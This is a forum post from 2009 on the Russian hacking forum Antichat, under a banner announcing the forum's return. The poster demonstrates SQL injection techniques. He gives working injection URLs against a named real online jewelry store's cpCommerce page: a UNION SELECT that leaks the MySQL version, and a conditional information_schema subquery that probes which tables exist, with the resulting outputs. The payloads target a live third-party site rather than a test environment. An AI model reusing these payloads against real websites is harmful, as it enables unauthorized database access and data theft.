Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
25.04.2009, 17:13
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от o3,14um
Ну во-первых, твой РЕАЛЬНОЙ пример
как-то и не работает =)
Я, конечно верю, что когда-то он работал, но посмотрим даже сейчас. Там по-видимому сделали пеерстройку и теперь проверяются переменные-результы на правильность и если хоть один из них неправильный - вылазит одибка мускуля. Ну, может там и подругому, но не суть.
Этот пример до сих пор отлично работает, смотри внимательно :
5.0.19
Сообщение от o3,14um
Вот вам слепая скуля
http://www.omjewels.com/cpCommerce/document.php?id_document=2-1
из багтрека
http://www.xakep.ru/post/47899/default.asp
Покажите пожалуйста на примере, этот метод...
Это тоже не слепая скуль (мои приветы автору баги  )
http://www.omjewels.com/cpCommerce/document.php?id_document=-2+union+select+1,version(),3,4,5,6,7--
5.0.51a-community
Но дело конечно не в этом. Суть метода помоему ясна предельно, в зависимости от выполнения условия, результат будет разным. Т.е. если есть таблица 'admins' выведется новость 112, если 'users' 113, что тут непонятного?
=================
Конкретно на примере:
http://www.omjewels.com/cpCommerce/document.php?id_document=(select+1+from+informatio n_schema.tables+where+table_name=0x6C6F6C+union+se lect+2+from+information_schema.tables+where+table_ name=0x5649455753)
выводится новость 2 т.е.
http://www.omjewels.com/cpCommerce/document.php?id_document=2
Это происходит потому. что таблицы lol нет, а таблица VIEWS есть. Так понятно?
Последний раз редактировалось jokester; 25.04.2009 в 17:30..
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Древовидный вид